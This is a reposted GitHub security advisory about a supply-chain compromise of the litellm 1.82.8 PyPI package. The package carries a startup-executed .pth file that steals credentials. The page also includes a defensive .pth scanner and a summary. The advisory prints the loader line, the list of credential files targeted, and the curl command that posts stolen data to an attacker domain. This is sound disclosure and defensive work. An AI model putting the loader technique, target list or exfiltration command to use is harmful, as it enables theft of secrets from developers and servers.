LmCast :: Stay tuned in

Tell HN: Litellm 1.82.7 and 1.82.8 on PyPI are compromised

Recorded: March 25, 2026, 3 a.m.

BerriAI / litellm

[Security]: CRITICAL: Malicious litellm_init.pth in litellm 1.82.8 — credential stealer #24512

Open. isfinne opened on Mar 24, 2026. Labels: llm translation, potential-duplicate

[LITELLM TEAM] - For updates from the team, please see: #24518

[Security]: CRITICAL: Malicious litellm_init.pth in litellm 1.82.8 PyPI package — credential stealer
Summary
The litellm==1.82.8 wheel package on PyPI contains a malicious .pth file (litellm_init.pth, 34,628 bytes) that automatically executes a credential-stealing script every time the Python interpreter starts — no import litellm required.
This is a supply chain compromise. The malicious file is listed in the package's own RECORD:
litellm_init.pth,sha256=ceNa7wMJnNHy1kRnNCcwJaFjWX3pORLfMh7xGL8TUjg,34628

Reproduction

pip download litellm==1.82.8 --no-deps -d /tmp/check
python3 -c "
import zipfile, os
whl = '/tmp/check/' + [f for f in os.listdir('/tmp/check') if f.endswith('.whl')][0]
with zipfile.ZipFile(whl) as z:
    pth = [n for n in z.namelist() if n.endswith('.pth')]
    print('PTH files:', pth)
    for p in pth:
        print(z.read(p)[:300])
"

You will see litellm_init.pth containing:

import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('...'))"])

Malicious Behavior (full analysis)

The payload is double base64-encoded. When decoded, it performs the following:

Stage 1: Information Collection
The script collects sensitive data from the host system:

System info: hostname, whoami, uname -a, ip addr, ip route
Environment variables: printenv (captures all API keys, secrets, tokens)
SSH keys: ~/.ssh/id_rsa, ~/.ssh/id_ed25519, ~/.ssh/id_ecdsa, ~/.ssh/id_dsa, ~/.ssh/authorized_keys, ~/.ssh/known_hosts, ~/.ssh/config
Git credentials: ~/.gitconfig, ~/.git-credentials
AWS credentials: ~/.aws/credentials, ~/.aws/config, IMDS token + security credentials
Kubernetes secrets: ~/.kube/config, /etc/kubernetes/admin.conf, /etc/kubernetes/kubelet.conf, /etc/kubernetes/controller-manager.conf, /etc/kubernetes/scheduler.conf, service account tokens
GCP credentials: ~/.config/gcloud/application_default_credentials.json
Azure credentials: ~/.azure/
Docker configs: ~/.docker/config.json, /kaniko/.docker/config.json, /root/.docker/config.json
Package manager configs: ~/.npmrc, ~/.vault-token, ~/.netrc, ~/.lftprc, ~/.msmtprc, ~/.my.cnf, ~/.pgpass, ~/.mongorc.js
Shell history: ~/.bash_history, ~/.zsh_history, ~/.sh_history, ~/.mysql_history, ~/.psql_history, ~/.rediscli_history
Crypto wallets: ~/.bitcoin/, ~/.litecoin/, ~/.dogecoin/, ~/.zcash/, ~/.dashcore/, ~/.ripple/, ~/.bitmonero/, ~/.ethereum/keystore/, ~/.cardano/, ~/.config/solana/
SSL/TLS private keys: /etc/ssl/private/, Let's Encrypt .pem and .key files
CI/CD secrets: terraform.tfvars, .gitlab-ci.yml, .travis.yml, Jenkinsfile, .drone.yml, Anchor.toml, ansible.cfg
Database credentials: PostgreSQL, MySQL, Redis, LDAP config files
Webhook URLs: grep for Slack/Discord webhook URLs in env and config files

Stage 2: Encryption & Exfiltration

Collected data is written to a temporary file
A random 32-byte AES-256 session key is generated via openssl rand
The collected data is encrypted with openssl enc -aes-256-cbc -pbkdf2
The AES session key is encrypted with a hardcoded 4096-bit RSA public key via openssl pkeyutl -encrypt -pkeyopt rsa_padding_mode:oaep
Both encrypted files are packed into tpcp.tar.gz
The archive is exfiltrated via:

curl -s -o /dev/null -X POST \
    "https://models.litellm.cloud/" \
    -H "Content-Type: application/octet-stream" \
    -H "X-Filename: tpcp.tar.gz" \
    --data-binary @tpcp.tar.gz

Key Technical Details

Trigger mechanism: .pth files in site-packages/ are executed automatically by the Python interpreter on startup (see Python docs on .pth files). No import statement is needed.
Stealth: The payload is double base64-encoded, making it invisible to naive source code grep.
Exfiltration target: https://models.litellm.cloud/ — note the domain litellm.cloud (NOT litellm.ai, the official domain).
RSA public key (first 64 chars): MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAvahaZDo8mucujrT15ry+...

Impact
Anyone who installed litellm==1.82.8 via pip has had all environment variables, SSH keys, cloud credentials, and other secrets collected and sent to an attacker-controlled server.
This affects:

Local development machines
CI/CD pipelines
Docker containers
Production servers

Affected Version

Confirmed: litellm==1.82.8 (PyPI wheel litellm-1.82.8-py3-none-any.whl)
Other versions: Not yet checked — the attacker may have compromised multiple releases

Recommended Actions

PyPI: Yank/remove litellm 1.82.8 immediately
Users: Check for litellm_init.pth in your site-packages/ directory
Users: Rotate ALL credentials that were present as environment variables or in config files on any system where litellm 1.82.8 was installed
BerriAI: Audit PyPI publishing credentials and CI/CD pipeline for compromise

Environment

OS: Ubuntu 24.04 (Docker container)
Python: 3.13
pip installed from PyPI
Discovered: 2026-03-24
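
A defender-side check for the trigger mechanism described in the issue above, as an added example (not code from the issue or from the litellm project): it reports every .pth file containing lines that Python's site module would execute at startup, either in installed site-packages directories or inside a downloaded wheel. The function names and the SUSPICIOUS token list are assumptions made for this example, and the token list is a heuristic rather than a complete signature.

```python
import re
import site
import sys
import zipfile
from pathlib import Path

# Heuristic tokens that a path-configuration file should never need (assumed list).
SUSPICIOUS = re.compile(r"subprocess|Popen|exec\s*\(|eval\s*\(|base64|os\.system|urllib|socket")

def executable_lines(pth_text):
    """Lines site.py would exec(): those starting with 'import' plus space or tab."""
    return [ln for ln in pth_text.splitlines()
            if ln.startswith(("import ", "import\t"))]

def audit_pth(name, data):
    """Describe one .pth file; returns None when it only lists paths."""
    text = data.decode("utf-8", errors="replace")
    code = executable_lines(text)
    if not code:
        return None
    hits = sorted({m.group(0) for ln in code for m in SUSPICIOUS.finditer(ln)})
    return {"file": name, "size": len(data), "exec_lines": len(code),
            "suspicious": hits, "preview": code[0][:80]}

def scan_site_packages(dirs=None):
    """Audit every .pth file in the given (default: this interpreter's) site dirs."""
    if dirs is None:
        dirs = site.getsitepackages() + [site.getusersitepackages()]
    findings = []
    for d in map(Path, dirs):
        if d.is_dir():
            for p in sorted(d.glob("*.pth")):
                f = audit_pth(str(p), p.read_bytes())
                if f:
                    findings.append(f)
    return findings

def scan_wheel(path):
    """Audit .pth files inside a downloaded wheel without installing it."""
    with zipfile.ZipFile(path) as z:
        found = (audit_pth(n, z.read(n)) for n in z.namelist() if n.endswith(".pth"))
        return [f for f in found if f]

if __name__ == "__main__":
    targets = sys.argv[1:]  # wheel paths; with none given, scan installed site dirs
    results = [f for t in targets for f in scan_wheel(t)] if targets else scan_site_packages()
    for f in results:
        level = "SUSPICIOUS" if f["suspicious"] else "review"
        print(f"[{level}] {f['file']} ({f['size']} bytes): {f['preview']}")
```

Legitimate packages (setuptools shims, editable installs) also ship .pth files with import lines, so a "review" result is expected on most systems; a "SUSPICIOUS" result is the one to investigate first.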

The issue filed against BerriAI's litellm repository reports a critical compromise of the litellm 1.82.8 package distributed via PyPI, describing it as a supply chain attack. The core of the issue is a malicious `litellm_init.pth` file. A .pth file is a path configuration file that Python processes from the `site-packages` directory at interpreter startup, and lines in it that begin with `import` are executed, so the credential-stealing script runs without any explicit import statement. The file measures 34,628 bytes and contains a double base64-encoded payload designed to harvest a wide range of sensitive data from the host system.

Specifically, the script collects system details (hostname, user, operating system), environment variables (including API keys, secrets, and tokens), SSH keys, Git credentials, and credentials for cloud services such as AWS, Kubernetes, GCP, and Azure. It also attempts to extract Docker configurations, package manager settings, shell history, crypto wallets, and SSL/TLS private keys. The collected data is then encrypted using AES-256 and RSA, packaged into a compressed archive, and exfiltrated via a POST request to `models.litellm.cloud`, a domain distinct from the official `litellm.ai` domain. The attacker uses double base64 encoding for concealment and a publicly accessible domain for exfiltration.

The impact of this compromise is extensive, potentially affecting local development environments, CI/CD pipelines, and production servers, given the widespread use of the litellm package. The issue recommends immediate action, including the immediate removal of the affected package from PyPI and a thorough audit of all systems where litellm 1.82.8 was installed. Affected parties should rotate all compromised credentials and conduct a comprehensive review of their CI/CD pipelines. The technical details also include the beginning of the hardcoded RSA public key, which can inform security assessments.